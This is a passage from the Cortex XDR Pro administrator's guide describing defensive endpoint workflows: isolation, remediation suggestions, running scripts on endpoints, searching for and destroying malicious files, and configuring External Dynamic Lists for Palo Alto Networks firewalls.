STEP 6 | Click Next.

STEP 7 | Review the action summary and click Done when finished.
In the next heart beat, the agent will receive the isolation request from Cortex XDR.

STEP 8 | To track the status of an isolation action, select Response > Action Center > Isolation.
If after initiating an isolation action, you want to cancel, right-click the action and select Cancel for
pending endpoint. You can cancel the isolation action only if the endpoint is still in Pending status and
has not been isolated yet.

STEP 9 | After you remediate the endpoint, cancel endpoint isolation to resume normal communication.
You can cancel isolation from the Actions Center (Isolation page) or from Endpoints > Endpoint
Management > Endpoint Administration. From either place right-click the endpoint and select Endpoint
Control > Cancel Endpoint Isolation.

Remediate Changes from Malicious Activity

When investigating suspicious incidents and causality chains you often need to restore and revert changes
made to your endpoints as result of a malicious activity. To avoid manually searching for the affected files
and registry keys on your endpoints, you can request Cortex XDR for remediation suggestions.
Cortex XDR investigates suspicious causality process chains and incidents on your endpoints and displays a
list of suggested actions to remediate processes, files and registry keys on your endpoint.
To initiate remediation suggestions, you must meet the following requirements:
• Cortex XDR Pro per Endpoint license
• An App Administrator, Privileged Responder, or Privileged Security Admin role permissions which
include the remediation permissions
• EDR data collection enabled
• Cortex XDR agent version 7.2 and above on Windows endpoints

STEP 1 | Initiate a remediation analysis.

You can initiate a remediation suggestions analysis from either of the following places:
• In the Incident View, navigate to Actions > Remediation Suggestions.

Endpoints that are part of the incident view and do not meet the required criteria are
excluded from the remediation analysis.
• In the Causality View, either:
• Right-click any process node involved in the causality chain and select Remediation Suggestion.
• Navigate to Actions > Remediation Suggestions.
Analysis can take a few minutes. If desired, you can minimize the analysis pop-up while navigating to
other Cortex XDR pages.

STEP 2 | Review the remediation suggestion summary and details.

294 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Field Description

ORIGINAL EVENT Summary of the initial event that triggered the malicious causality chain.
DESCRIPTION

ORIGINAL EVENT Timestamp of the initial event that triggered the malicious causality chain.
TIMESTAMP

ENDPOINT NAME Hostname of the endpoint.

IP ADDRESS The IP address associated with the endpoint.

ENDPOINT STATUS Connectivity status of the endpoint. Can be either:

• Connected
• Disconnected
• Uninstalled
• Connection lost

DOMAIN Domain or workgroup to which the endpoint belongs, if applicable.

ENDPOINT ID Unique ID assigned by Cortex XDR that identifies the endpoint.

SUGGESTED Action suggested by the Cortex XDR remediation scan to apply to causality
REMEDIATION chain process:
• Delete File
• Restore File
• Rename File
• Delete Registry Value
• Restore Registry Value
• Terminate Process—Available when selecting Remediation Suggestions
for a node in the Causality View.
• Terminate Causality—Terminate the entire causality chain of processes
that have been executed under the process tree of the listed Causality
Group Owner (GCO) process name.
• Manual Remediation—Requires you to take manual action to revert or
restore.

SUGGESTED Summary of the remediation suggestion to apply to the file or registry.

REMEDIATION
DESCRIPTION

REMEDIATION Status of the applied remediation:

STATUS
• Pending

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 295

© 2020 Palo Alto Networks, Inc.
 Field Description
• In Progress
• Failed
• Completed Successfully
• Partial Success

REMEDIATION DATE Displays the timestamp of when all of the endpoint artifacts were
remediated. If missing a successful remediation, field will not display
timestamp.

STEP 3 | Select one or more Original Event Descriptions and right-click to Remediate.

STEP 4 | Track your remediation process.

1. Navigate to Response > Action Center > All Actions.
2. In the Action Type field, locate your remediation process.
3. Right-click Additional data to open the Detailed Results window.

Run Scripts on an Endpoint

For enhanced endpoint remediation and endpoint management, you can run Python 3.7 scripts on your
endpoints directly from Cortex XDR. For commonly used actions, Cortex XDR provides pre-canned scripts
you can use out-of-the-box. You can also write and upload your own Python scripts and code snippets into
Cortex XDR for custom actions. Cortex XDR enables you to manage, run, and track the script execution on
the endpoints, as well as store and display the execution results per endpoint.
The following are pre-requisites to executing scripts on your endpoints:
• Cortex XDR Pro Per Endpoint license
• Endpoints running the Cortex XDR agent 7.1 and later releases. Since the agent uses its built-in
capabilities and many available Python modules to execute the scripts, no additional setup is required on
the endpoint.
• Role in the hub with the following permissions to run and configure scripts:
• Run Standard scripts
• Run High-risk scripts
• Script configuration (required to upload a new script, run a snippet, and edit an existing script)
• Scripts (required to view the Scripts Library and the script execution results)

Running snippets requires both Run High-risk scripts and Script configuration
permissions. Additionally, all scripts are executed as System User on the endpoint.
Use the following work flow to start running scripts on your endpoints:
• Manage All Scripts in the Scripts Library
• Upload Your Scripts
• Run a Script on Your Endpoints
• Track Script Execution and View Results
• Troubleshoot Script Execution
• Disable Script Execution

296 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Manage All Scripts in the Scripts Library
All your scripts are available in the Action Center > Scripts Library, including pre-canned scripts provided by
Palo Alto Networks and custom scripts that you uploaded. From the Scripts Library, you can view the script
code and meta data.
The following table describes both the default and additional optional fields that you can view in the Scripts
Library per script. The fields are in alphabetical order.

Field Description

Compatible OS The operating systems the script is compatible with.

Created By Name of the user who created the script. For pre-canned
scripts, the user name is Palo Alto Networks.

Description The script description is an optional field that can be filled-in

when creating, uploading, or editing a script.

Id Unique ID assigned by Cortex XDR that identifies the script.

Modification Date Last date and time in which the script or its attributes were
edited in Cortex XDR.

Name The script name is a mandatory filed that can be filled-in when
creating, uploading, or editing a script.

Outcome • High-risk—Scripts that may potentially harm the endpoint.

• Standard—Scripts that do not have a harmful impact on the
endpoint.

Script FileSHA256 The SHA256 of the code file.

From the Scripts Library, you can perform the following additional actions:
• Download script—To see exactly what the script does, right-click and Download the Python code file
locally.
• View / Download definitions file—To view or download the script meta-data, right-click the script and
select the relevant option.
• Run—To run the selected script, right-click and select Run. Cortex XDR redirects you to the Action
Center with the details of this script already populating the new action fields.
• Edit—To edit the script code or meta-data, right-click and Edit. This option is not available for pre-
canned scripts provided by Palo Alto Networks.
By default, Palo Alto Networks provides you with a variety of pre-canned scripts that you can use out-
of-the-box. You can view the script, download the script code and meta-data, and duplicate the script,
however you cannot edit the code or definitions of pre-canned scripts.
The following table lists the pre-canned scripts provided by Palo Alto Networks, in alphabetical order. New
pre-canned scripts are continuously uploaded into Cortex XDR though content updates, and are labeled
New for a period of three days.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 297

© 2020 Palo Alto Networks, Inc.
 Script name Description

delete_file Delete a file on the endpoint according to the full path.

file_exists Search for a specific file on the endpoint according to the full
path.

get_process_list List CPU and memory for all processes running on the endpoint.

list_directories List all the directories under a specific path on the endpoint,
You can limit the number of levels you want to list.

process_kill_cpu Set a minimum CPU value and kill all process on the endpoint
that are using higher CPU.

process_kill_mem Set a minimum RAM usage in bytes and kill all process on the
endpoint that are using higher private memory.

process_kill_name Kill all processes by a given name.

*registry_delete Delete a Registry key or value on the endpoint.

(Windows)

*registry_get Retrieve a Registry value from the endpoint.

(Windows)

*registry_set Set a Registry value from the endpoint.

(Windows)

*Since all scripts are running under System context, you cannot perform any Registry
operations on user-specific hives (HKEY_CURRENT_USER of a specific user).

Upload Your Scripts

You can write and upload additional scripts to the Scripts Library.
To upload a new script:

STEP 1 | From Action Center > Scripts Library select +New Script.

298 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Drag and drop your script file, or browse and select it. During the upload, Cortex XDR parses your script
to ensure you are using only Python modules supported by Cortex XDR. Click Supported Modules if you
want to view the supported modules list. If your script is using unsupported Python modules, or if your
script is not using proper indentation, Cortex XDR will require that you fix it. You can use the editor to
update your script directly in Cortex XDR.

STEP 2 | Add meta-data to your script.

You can fill-in the fields manually, and also upload an existing definitions file in the supported format to
automatically fill-in some or all of the definition. To view the manifest format and create your own, see
Creating a Script Manifest.
• General—The general script definitions include: name and description, risk categorization, supported
operating systems, and timeout in seconds.

• Input—Set the starting execution point of your script code. To execute the script line by line, select
Just run. Alternatively, to set a specific function in the code as the entry point, select Run by entry
point. Select the function from the list, and specify for each function parameter its type.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 299

© 2020 Palo Alto Networks, Inc.
 • Output—If your script returns an output, Cortex XDR displays that information in the script results
table.
• Single parameter—If the script returns a single parameter, select the Output type from the list and
the output will be displayed as is. To detect the type automatically, select Auto Detect.
• Dictionary—If the script returns more than a single value, select Dictionary from the Output
type list. By default, Cortex XDR displays in the script results table the dictionary value as is. To
improve the script results table display and be able to filter according to the returned value, you
can assign a user friendly name and type to some or all of your dictionary keys, and Cortex XDR
will use that in the results table instead.

To retrieve files from the endpoint, add to the dictionary the files_to_get key to include an array
of paths from which files on the endpoint will be retrieved from the endpoint.

STEP 3 | When you are done, Create the new script.

The new script is uploaded to the Scripts Library.

300 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Creating a Script Manifest
The script manifest file you upload into Cortex XDR has to be a single-line textual file, in the exact format
explained below. If your file is structured differently, the manifest validation will fail and you will be required
to fix the file.

For the purpose of this example, we are showing each parameter in a new line. However,
when you create your file, you must remove any \n or \t characters.

This is an example of the manifest file structure and content:

{
"name":"script name",
"description":"script description",
"outcome":"High Risk|Standard",
"platform":"Windows,macOS,Linux",
"timeout":600,
"entry_point":"entry_point_name",
"entry_point_definition":{
"input_params":[
{"name":"registry_hkey","type":"string"},
{"name":"registry_key_path","type":"number"},
{"name":"registry_value","type":"number"}],
"output_params":{"type":"JSON","value":[
{"name":"output_auto_detect","friendly_name":"name1","type":"auto_detect"},
{"name":"output_boolean","friendly_name":"name2","type":"boolean"},
{"name":"output_number","friendly_name":"name3","type":"number},
{"name":"output_string","friendly_name":"name4","type":"string"},
{"name":"output_ip","friendly_name":"name5","type":"ip"}]
}
}

Always use lower case for variable names.

STEP 1 | Fill-in the script name and description.

You can use letters and digits. Avoid the use of special characters.

STEP 2 | Categorize the script.

If a script is potentially harmful, set it as High— Risk to limit the user roles that can run it. Otherwise,
set it as Standard.

STEP 3 | Assign the platform.

Enter the name of the operating system this script supports. The options are Windows, macOS, and
Linux. If you need to define more than one, use a comma as a separator.

STEP 4 | Set the script timeout.

Enter the number of seconds after which Cortex XDR agent halts the script execution on the endpoint.

STEP 5 | Configure the script input and output.

To Run by entry point, you must specify the entry point name, and all input and output definitions.
The available parameter types are:
• auto_detect

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 301

© 2020 Palo Alto Networks, Inc.
 • boolean
• number
• string
• ip
• number_list
• string_list
• ip_list
To set the script to Just run, leave both Entry_point and Entry_point_definitions empty:

{
"name":"scrpit name",
"description":"script description",
"outcome":"High Risk|Standard",
"platform":"Windows,macOS,Linux",
"timeout":600,
"entry_point":"",
"entry_point_definition":{}
}

Run a Script on Your Endpoints

Follow this high-level workflow to run scripts on your endpoints that perform actions, or retrieve files and
data from the endpoint back to Cortex XDR.

STEP 1 | Initiate a new action to run a script.

From Action Center > +New Action, select Run Script.

STEP 2 | Select an existing script or add a code snippet.

1. To run an existing script, start typing the script name or description in the search field, or scroll down
and select it from the list. Set the script timeout in seconds and any other script parameters, if they
exist. Click Next
2. Alternatively, you can insert a Code Snippet. Unlike scripts, snippets are not saved in the Cortex XDR
Scripts Library and cannot receive input or output definitions. Write you snippet in the editor, fill-in
the timeout in seconds, and click Next

STEP 3 | Select the target endpoints.

Select the target endpoints on which to execute the script. When you’re done, click Next.

STEP 4 | Review the summary and run script.

Cortex XDR displays the summary of the script execution action. If all the details are correct, Run
the script and proceed to Track Script Execution and View Results. Alternatively, to track the script
execution progress on all endpoints and view the results in real-time, Run in interactive mode.

Run Scripts in Interactive Mode

When you need to run several scripts on the same target scope of endpoints, or when you want to view
and inspect the results of those scripts immediately and interactively, you can run your scripts in Interactive
Mode. You can also initiate interactive mode for an endpoint directly from Endpoints Management. In
this mode, Cortex XDR enables you to track the execution progress on all endpoints in real-time, run more
scripts or code snippets as you go, and view the results of these scripts all in one place.

302 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 In Interactive Mode, Cortex XDR displays general information that includes the scope of target endpoints
and a list of all the scripts that are being executed in this session. For each script on the executed scripts list,
you can view the following:
• The script name, date and time the script execution action was initiated, and a list of input parameters.
• A progress bar that indicates in real-time the number of endpoints for which the script execution is In
Progress, Failed, or Completed. When you hover over the progress bar, you can drill-down for more
information about the different sub-statuses included in each group. Similarly, you can also view this
information on the scripts list to the left in the form of a pie chart that is dynamically updated per script
as it is being executed.

Cortex XDR does not include disconnected endpoints in the visualization of the script
execution progress bar or pie chart. If a disconnected endpoint later gets connected,
Cortex XDR will execute the script on that endpoint and the graphic indicators will change
accordingly to reflect the additional run and its status.
• Dynamic script results that are continuously updated throughout the script execution progress. Cortex
XDR lists the results, and graphically aggregates results only if they have a small variety of values. When
both views are available, you can switch between them.
While in Interactive Mode, you can continuously execute more scripts and add code snippets that will be
immediately executed on the target endpoints scope. Cortex XDR logs all the scripts and code snippets you
execute in Interactive Mode, and you can later view them in the Action Center.

• To add another script, select the script from the Cortex XDR scripts library, or start typing a
Code Snippet. Set the script timeout and input parameters as necessary, and Run when you
are done. The script is added to the executed scripts list and its runtime data is immediately
displayed on screen.

Track Script Execution and View Results

After you run a script, you see the script execution action in the Action Center.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 303

© 2020 Palo Alto Networks, Inc.
 From the Action Center, you can:
• Track Script Execution Status
• Cancel or Abort Script Execution
• View Script Execution Results
• Open Script Interactive Mode
• Rerun a Script
Track Script Execution Status
All script execution actions are logged in the Action Center. The Status indicates the action progress, which
includes the general action status and the breakdown by endpoints included in the action. The following
table lists the possible status of a script execution action for each endpoint, in alphabetical order:

Status Description

Aborted The script execution action was aborted after it was already In
Progress on the endpoint.

Canceled The script execution action was canceled from Cortex XDR
before the Cortex XDR agent pulled the request from the
server.

Completed Successfully The script was executed successfully on the endpoint with no
exceptions.

Expired Script execution actions expire after four days. After an

action expires, the status of any remaining Pending actions
on endpoints change to Expired and these endpoints will not
receive the action.

Failed A script can fail due to these reasons:

• The Cortex XDR agent failed to execute the script.
• Exceptions occurred during the script execution.
To understand why the script execution failed, see
Troubleshoot Script Execution.

In Progress The Cortex XDR agent pulled the script execution request.

304 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
Status Description

Pending The Cortex XDR agent has not yet pulled the script execution
request from the Cortex XDR server.

Pending Abort The Cortex XDR agent is in the process of executing the script,
and has not pulled the abort request from the Cortex XDR
server yet.

Timeout The script execution reached its configured time out and the
Cortex XDR agent stopped the execution on the endpoint.

Cancel or Abort Script Execution

Depending on the current status of the script execution action on the target endpoints, you can cancel or
abort the action for Pending and In Progress actions:
• When the script execution action is Pending, the Cortex XDR agent has not pulled the request yet
from Cortex XDR. When you cancel a pending action, the Cortex XDR server pulls back the pending
request and updates the action status as Canceled. To cancel the action for all pending endpoints, go
to the Action Center, right-click the action and Cancel for pending endpoints. Alternatively, to cancel
a pending action for specific endpoints only, go to Action Center > Additional data > Detailed Results,
right-click the endpoint(s) and Cancel pending action
• When the script execution action is In Progress, the Cortex XDR agent has begun running the script on
the endpoint. When you abort an in progress action, the Cortex XDR agent halts the script execution on
the endpoint and updates the action status as Aborted. To abort the action for all In Progress endpoints
and cancel the action for any Pending endpoints, go to the Action Center, right-click the action and
Abort and cancel execution. Alternatively, to abort an in progress action for specific endpoints only, go
to Action Center > Additional data > Detailed Results, right-click the endpoint(s) and Abort for endpoint
in progress
View Script Execution Results
Cortex XDR logs all script execution actions, including the script results and specific parameters used in
the run. To view the full details about the run, including returned values, right-click the script and select
Additional data.
The script results are divided into two sections. On the upper bar, Cortex XDR displays the script meta-data
that includes the script name and entry point, the script execution action status, the parameter values used
in this run and the target endpoints scope. You can also download the exact code used in this run as a py
file.
In the main view, Cortex XDR displays the script execution results in two formats:
• Aggregated results—A visualization of the script results. Cortex XDR automatically aggregates only
results that have a small variety of values. To see how many of the script results were aggregated
successfully, see the counts on the toggle (for example, aggregated results 4/5). You can filter the
results to adjust the endpoints considered in the aggregation. You can also generate a PDF report of the
aggregated results view.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 305

© 2020 Palo Alto Networks, Inc.
 • Main results view—A detailed table listing all target endpoints and their details.

In addition the endpoint details (name, IP, domain, etc), the following table describes both the default
and additional optional fields that you can view per endpoint. The fields are in alphabetical order.

Field Description

*Returned values If your script returned values, the values are also listed in
the additional data table according to your script output
definitions.

Execution timestamp The date and time the Cortex XDR agent started the script
execution on the endpoint. If the execution has not started
yet, this field is empty.

Failed files The number of files the Cortex XDR agent failed to retrieve
from the endpoint.

306 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Field Description

Retention date The date after which the retrieved file will no longer be
available for download in Cortex XDR. The value is 90 days
from the execution date.

Retrieved files The number of files the Cortex XDR successfully retrieved
from the endpoint.

Status See the list of statuses and their descriptions in Track Script
Execution Status.

Standard output The returned stdout

For each endpoint, you can right-click and download the script stdout, download retrieved files if there
are any, and view returned exceptions if there are any. You can also Export to file to download the
detailed results table in TSV format.
Open Script Interactive Mode
In Interactive Mode, Cortex XDR enables you to dynamically track the script execution progress on all
target endpoints and view the results as they are being received in real-time. Additionally, you can start
executing more scripts on the same scope of target endpoints.
To initiate Interactive Mode for an already running script:

• From the Action Center, right-click the execution action of the relevant script and select Open
in interactive mode.

Rerun a Script
Cortex XDR allows you to select a script execution action and rerun it. When you rerun a script, Cortex
XDR uses the same parameters values, target endpoints, and defined timeout that were defined for the
previous run. However, if the target endpoints in the original run were defined using a filter, then that filter
will be recalculated when you rerun the script. Cortex XDR will use the current version of the script. If
since the previous run the script has been deleted, or the supported operating system definition has been
modified, you will not be able to rerun the script.
To rerun a script:

STEP 1 | From the Action Center, right-click the script you want to rerun and select Rerun.
You are redirected to the final summary stage of the script execution action.

STEP 2 | Run the script.

To run the script with the same parameters and on the same target endpoints as the previous run,
click Done. To change any of the previous run definitions, navigate through the wizard and make the
necessary changes. Then, click Done. The script execution action is added to the Action Center

Troubleshoot Script Execution

To understand why a script returned Failed execution status, you can do the following:
1. Check script exceptions—If the script generated exceptions, you can view them to learn why the script
execution failed. From the Action Center, right click the Failed script and select Additional data. In

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 307

© 2020 Palo Alto Networks, Inc.
 the Script Results table, right-click an endpoint for which the script execution failed and select View
exceptions. The Cortex XDR agent executes scripts on Windows endpoints as a SYSTEM user, and on
Mac and Linux endpoints as a root user. These context differences could cause differences in behavior,
for instance when using environment variables.
2. Validate custom scripts—When a custom script you uploaded failed and the reason the script failed
is still unclear from the exceptions, or if the script did not generate any exceptions, try to identify
whether it failed due to an error in Cortex XDR or due to an error in the script. To identify the error
source, execute the script without the Cortex XDR agent on the same endpoint with regular Python 3.7
installation. If the script execution is unsuccessful, you should fix your script. Otherwise, if the script was
executed successfully with no errors, please contact Palo Alto Networks support.

Disable Script Execution

If you want prevent Cortex XDR from running scripts on a Cortex XDR agent, you can disable this capability
during agent installation or later on through Cortex XDR Endpoint Administration. Disabling script
execution is irreversible. If you later want to re-enable this capability on the endpoint, you must re-install
the Cortex XDR agent. See the Cortex XDR Agent Administrator’s Guide for more information.

Disabling Script Execution does not take effect on scripts that are in progress.

Search and Destroy Malicious Files

To take immediate action on known and suspected malicious files, you can now search and destroy the files
from the Cortex XDR management console. After you identify the presence of the file, you can immediately
destroy the file from any or all endpoints on which the file exists.
The Cortex XDR agent builds a local database on the endpoint with a list of all the files, including their path,
hash, and additional metadata. Depending on the number of files and disk size of each endpoint, it can take
a few days for Cortex XDR to complete the initial endpoint scan and to populate the files database. You
cannot search an endpoint until the initial scan is complete and all file hashes are calculated. After the initial
scan is complete and the Cortex XDR agent retains a snapshot of the endpoint files inventory, the agent
maintains the files database by initiating periodic scans and closely monitoring all actions performed on the
files.
You can search for specific files according to the file hash, the file full path, or a partial path using regex
parameters from the Action Center or the Query Builder. After you find the file, you can quickly select it
in the search results and destroy the file by hash or by path. You can also destroy a file from the Action
Center, without performing a search, if you know the path or hash. When you destroy a file by hash, all the
file instances on the endpoint are removed.

The Cortex XDR agent does not include in the local files inventory the following:
• Information about files that existed on the endpoint and were deleted before the Cortex
XDR agent was installed.
• Information about files where the file size exceeds the maximum file size for hash
calculations that is preconfigured in Cortex XDR.
• If the Agent Settings Profile on the endpoint is configured to monitor common file types
only, then the local files inventory includes information about these file types only. You
cannot search or destroy file types that are not included in the list of common file types.

The following are prerequisites to enable Cortex XDR to search and destroy files on your endpoints:

308 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 Requirement Description

Licenses and Add-ons • Provision an active Cortex XDR Pro per Endpoint license.
• Ensure the Host Insights Add-on is enabled on your tenant.

Supported Platforms • Windows—Cortex XDR agent 7.2 or a later release.

• Mac—Cortex XDR agent 7.3 or a later release running on macOS 10.15.4
or a later release.
• Linux—Not supported.

Setup and Permissions • Ensure File Search and Destroy is enabled for your Cortex XDR agent.
• Ensure your Cortex XDR role in the hub has File search and Destroy files
permissions.

Search a File
You can search for files on the endpoint by file hash or file path. The search returns all instances of this file
on the endpoint. You can then immediately proceed to destroy all the file instances on the endpoint, or
upload the file to Cortex XDR for further investigation.
• To search for a file from the Query Builder, create a query using Native Search for Finding Files.
• To search for a file from the Action Center wizard:

STEP 1 | From the Action Center select +New Action > File Search.

STEP 2 | Configure the search method:

• To search by hash, enter the file SHA256 value. When you search by hash, you can also search for
deleted instances of this file on the endpoint.
• To search by path, enter the specific path for the file on the endpoint or specify the path using
wildcards. When you provide a partial path or partial file name using *, the search will return all the
results that match the partial expression. Note the following limitations:
• The file path must begin with a drive name, for example: c:\.
• You must specify the exact path folder hierarchy, for example c:\users\user\file.exe. You
must specify the exact path folder hierarchy also when you replace folder names with wildcards,
by using a wildcard for each folder in the hierarchy. For example, c:\*\*\file.exe.
Click Next.

STEP 3 | Select the target endpoints.

Select the target endpoints on which you want to search for the file. Cortex XDR displays only endpoints
eligible for file search. When you’re done, click Next.

STEP 4 | Review the summary and initiate the search.

Cortex XDR displays the summary of the file search action.If you need to change your settings, go Back.
If all the details are correct, click Run. The File search action is added to the Action Center.

STEP 5 | Review the search results.

In the Action Center, you can monitor the action progress in real-time and view the search results for
all target endpoints. For a detailed view of the results, right-click the action and select Additional data.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 309

© 2020 Palo Alto Networks, Inc.
 Cortex XDR displays the search criteria, timestamp, and real-time status of the action on the target
endpoints. You can:
• View results by file (default view)—Cortex XDR displays the first 100 instances of the file from every
endpoint. Each search result includes details about the endpoint (such as endpoint status, name, IP
address, and operating system) and details about the file instance (such as full file name and path,
hash values, and creation and modification dates).
• View the results by endpoint—For each endpoint in the search results, Cortex XDR displays details
about the endpoint (such as endpoint status, name, IP address, and operating system), the search
action status, and details about the file (whether it exists on the endpoint or not, how many instances
of the file exist on the endpoint, and the last time the action was updated).

If not all endpoints in the query scope are connected or the search has not completed, the search action
remains in Pending status in the Action Center.

STEP 6 | (Optional) Destroy a file.

After you located the malicious file instances on all your endpoints, proceed to destroyall the file
instances on the endpoint. From the search results Additional data, right-click the file to immediately
Destroy by path, Destroy by hash, or Get file to upload it to Cortex XDR for further examination.

Destroy a File
When you know a file is malicious, you can destroy all its instances on your endpoints directly from Cortex
XDR. You can destroy a file immediately from the File search action result, or initiate a new action from the
Action Center. When you destroy a file, the Cortex XDR agent deletes all the file instances on the endpoint.
• To destroy a file from the file search results, refer to Step 6 above.
• To destroy a file from the Action Center wizard:

STEP 1 | From the Action Center select +New Action > Destroy File.

STEP 2 | To destroy by hash, provide the SHA25 of the file. To destroy by path, specify the exact file
path and file name. Click Next.

STEP 3 | Select the target endpoints.

Select the target endpoints from which you want to remove the file. Cortex XDR displays only endpoints
eligible for file destroy. When you’re done, click Next.

310 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
STEP 4 | Review the summary and initiate the action.
Cortex XDR displays the summary of the file destroy action. If you need to change your settings, go
Back. If all the details are correct, click Run. The File destroy action is added to the Action Center.

Manage External Dynamic Lists

An External Dynamic List (EDL) is a text file hosted on an external web server that your Palo Alto Networks
firewall uses to provide control over user access to IP addresses and domains that the Cortex XDR has
found to be associated with an alert.
Cortex XDR hosts two external dynamic lists you can configure and manage from the Cortex XDR
management console:
• IP Addresses EDL
• Domain Names EDL
To maintain an EDL in Cortex XDR, you must meet the following requirements:
• Cortex XDR Pro per TB or Cortex Pro per Endpoint license
• An App Administrator, Privileged Investigator, or Privileged Security Admin role which include EDL
permissions
• Palo Alto Networks firewall running PAN-OS 9.0 or a later release
• Access to your Palo Alto Networks firewall configuration

STEP 1 | Enable EDL.

1.
Navigate to > Settings > External Dynamic List.

2. Enable External Dynamic List and enter the Username and Password that the Palo Alto Networks
firewall should use to access the Cortex XDR EDL.

STEP 2 | Record the IP Addresses EDL URL and the Domains EDL URL. You will need these URLs in the
coming steps to point the firewall to these lists.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 311

© 2020 Palo Alto Networks, Inc.
 Recommended to test the URLs in a browser to confirm they are active. In order to test, you need to
provide the username and password in the URL itself:
• https://username:password@edl-<FDQN>/block_list?type=ip
• https://username:password@edl-<FDQN>/block_list?type=domain
If you browser does not support authentication in the URL, try one of the following options:
• (For Linux/OS/Windows) In Postman, enter your IP Addresses and Domain Names URLS and an
Authorization Header (Basic Auth) with your username and password.
• (For Linux/OS/Windows) Enter the following curl command:
• curl https://username:password@edl-<FDQN>/block_list?type=ip
• curl https://username:password@edl-<FDQN>/block_list?type=domain
• (For Windows PowerShell version 5 and up) Enter the following command:

[Net.ServicePointManager]::SecurityProtocol =
[Net.SecurityProtocolType]::Tls12
$username = "username"
$password = "password"
$base64AuthInfo =
[Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(("{0}:{1}" -f
$username,$password)))

Invoke-WebRequest -Uri https://edl-<FQDN>/block_list?type=ip -Headers

@{Authorization=("Basic {0}" -f $base64AuthInfo)} -UseBasicParsing

STEP 3 | Save the EDL configuration.

STEP 4 | Enable the firewall to authenticate the Cortex XDR EDL.

1. Download and save the following root certificate: https://certs.godaddy.com/repository/gd-class2-
root.crt.
2. On the firewall, select Device > Certificate Management > Certificates and Import the certificate.
Make sure to give the device certificate a descriptive name, and select OK to save the certificate.

3. Select Device > Certificate Management > Certificate Profile and Add a new certificate profile.
4. Give the profile a descriptive name and Add the certificate to the profile.

312 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

© 2020 Palo Alto Networks, Inc.
 5. Select OK to save the certificate profile.

STEP 5 | Set the Cortex XDR EDL as the source for a firewall EDL.
For more detailed information about how Palo Alto Networks firewall EDLs work, how you can use
EDLs, and how to configure them, review how to Use an External Dynamic List in Policy.
1. On the firewall, select Objects > External Dynamic Lists and Add a new list.
2. Define the list Type as either IP List or Domain List.
3. Enter the IP Addresses Block List URL or the Domains Block List URL that you recorded in the last
step as the list Source.
4. Select the Certificate Profile that you created in the last step.
5. Select Client Authentication and enter the username and password that the firewall must use to
access the Cortex XDR EDL.
6. Use the Repeat field to define how frequently the firewall retrieves the latest list from Cortex XDR.

7. Click OK to add the new EDL.

STEP 6 | Select Policies > Security and Add or edit a security policy rule to add the Cortex XDR EDL as
match criteria to a security policy rule.
Review the different ways you can Enforce Policy on an External Dynamic List; this topic describes the
complete workflow to add an EDL as match criteria to a security policy rule.
1. Select Policies > Security and Add or edit a security policy rule.
2. In the Destination tab, select Destination Zone and select the external dynamic list as the
Destination Address.
3. Click OK to save the security policy rule and Commit your changes.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response 313

© 2020 Palo Alto Networks, Inc.
 You do not need to perform additional commit or make any subsequent configuration changes for
the firewall to enforce the EDL as part of your security policy; even as you update the Cortex XDR
EDL, the firewall will enforce the list most recently retrieved from Cortex XDR.

You can also use the Cortex XDR domain list as part of a URL Filtering profile or as an
object in a custom Anti-Spyware profile; when attached to a security policy rule, a URL
Filtering profile allows you to granularly control user access to the domains on the list.

STEP 7 | Add an IP address or Domain to your EDL.

You can add to your IP address or Domain lists as you triage alerts from the Action Center or throughout
the Cortex XDR management console.

Make sure EDL sizes don’t exceed your firewall model limit.

To add an IP address or Domain from the Action Center, Initiate an Endpoint Action to Add to EDL. You
can choose to enter the IP address or Domain you want to add Manually or choose to Upload File.
During investigation, you can also Add to EDL from the Actions menu that is available from investigation
pages such as the Incidents View, Causality View, IP View, or Quick Launcher.

STEP 8 | At any time, you can view and make changes to the IP addresses and domain names lists.
1. Navigate to Response > Action Center > EDL.

2. Review your IP addresses and domain names lists.

3. If desired, select New Action to add additional IP addresses and domain names.
4. If desired, select one or more IP addresses or domain names, right-click and Delete any entries that
you no longer want included on the lists.

314 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Investigation and Response

Broker VM
> Broker VM Overview
> Set up the Broker VM
> Manage Your Broker VMs
> Broker VM Notifications

315
316 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Broker VM
© 2020 Palo Alto Networks, Inc.
Broker VM Overview
The Palo Alto Networks Broker is a secured virtual machine (VM), integrated with Cortex XDR, that bridges
